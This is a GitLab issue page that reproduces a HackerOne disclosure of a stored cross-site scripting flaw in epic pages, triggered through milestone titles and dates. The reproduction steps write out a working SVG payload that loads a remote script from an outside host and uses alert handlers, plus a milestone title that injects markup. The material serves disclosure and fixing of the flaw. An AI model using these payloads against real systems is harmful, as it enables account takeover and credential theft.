Skip to content
GitLab
Next
    • GitLab: the DevOps platform
    • Explore GitLab
    • Install GitLab
    • How GitLab compares
    • Get started
    • GitLab docs
    • GitLab Learn
  • Pricing
  • Talk to an expert
  • /
  • Help
    • Help
    • Support
    • Community forum
    • Submit feedback
    • Contribute to GitLab
    Projects Groups Topics Snippets
  • Register
  • Sign in
  • GitLab GitLab
  • Project information
    • Project information
    • Activity
    • Labels
    • Members
  • Repository
    • Repository
    • Files
    • Commits
    • Branches
    • Tags
    • Contributor statistics
    • Graph
    • Compare revisions
    • Locked files
  • Issues 54.9k
    • Issues 54.9k
    • List
    • Boards
    • Service Desk
    • Milestones
    • Iterations
    • Requirements
  • Merge requests 1.5k
    • Merge requests 1.5k
  • CI/CD
    • CI/CD
    • Pipelines
    • Jobs
    • Artifacts
    • Schedules
    • Test cases
  • Deployments
    • Deployments
    • Environments
    • Releases
  • Packages and registries
    • Packages and registries
    • Package Registry
    • Container Registry
    • Terraform modules
    • Model experiments
  • Monitor
    • Monitor
    • Incidents
  • Analytics
    • Analytics
    • Value stream
    • CI/CD
    • Code review
    • Insights
    • Issue
    • Repository
  • Snippets
    • Snippets
  • Activity
  • Graph
  • Create a new issue
  • Jobs
  • Commits
  • Issue Boards
Collapse sidebar
  • GitLab.orgGitLab.org
  • GitLabGitLab
  • Issues
  • #294176
Closed
Open
Issue created Dec 16, 2020 by GitLab SecurityBot@gitlab-securitybotReporter

Stored XSS in epic's pages

HackerOne report #1055814 by mike12 on 2020-12-10, assigned to @rchan-gitlab:

Report | Attachments | How To Reproduce

Report

Hi Gitlab!

It's possible to inject arbitrary JS code into an epic's page using the Start date and Due date.

This XSS works for:

  1. gitlab.com using Firefox (tested in Firefox 83.0)
  2. A self-hosted GitLab instance without CSP using Safari (tested in Safari 13.1), Chrome (tested in Chrome 87.0.4280.88) or Firefox
Steps to reproduce using Firefox
  1. Open your browser and navigate to https://gitlab.com

  2. Create a group and a project in it

  3. Add a file named demo.svg to the project with the following content:

    <svg id="x"  
         xmlns="http://www.w3.org/2000/svg"  
         width="100"  
         height="100"  
    >  
        <foreignObject>  
            <iframe xmlns="http://www.w3.org/1999/xhtml"  
                    srcdoc='<script src=https://gitlab.com/mike12-h1/csp/-/raw/master/index.js> </script>'></iframe>  
        </foreignObject>
    
        <image href="foo" onerror="alert('onerror')"/>
    
        <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert('xlink:href')">  
            <circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red"/>  
            <text x="50%" y="50%" text-anchor="middle" stroke="#000000" stroke-width="1px" dy=".3em">Click me</text>  
        </a>  
    </svg>  
  4. Create a new epic in the group

  5. Create a new issue in the project

  6. Assign the created epic to the issue

  7. Create a new milestone in the project

    1. Title: <svg width="100"><use xlink:href="/<YOUR-GROUP-NAME>/<YOUR-PROJECT>/-/raw/master/demo.svg#x" /></svg> (Replace <YOUR-GROUP-NAME> and <YOUR-PROJECT> with your values)
    2. Specify any valid Start Date and Due Date values
  8. Assign the created milestone to the issue

  9. Navigate to the epic created in step 4

  10. Hover your mouse over the inherited due date

1.png

Steps to reproduce using Safari
  1. Run a self-hosted Gitlab instance
  2. Repeat steps 2 through 10 from the "Steps to reproduce using Firefox" section.
Steps to reproduce using Chrome
  1. Run a self-hosted Gitlab instance
  2. Repeat steps 2 through 10 from the "Steps to reproduce using Firefox" section.
  3. Click the red circle in the due date tooltip.

2.png

3.png

Impact

An attacker can:

  1. Perform any action within the application that a user can perform
  2. Steal sensitive user data, including credentials

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

  • 2.png
  • 1.png
  • 3.png

How To Reproduce

Please add reproducibility information to this section:

Assignee
Assign to
Time tracking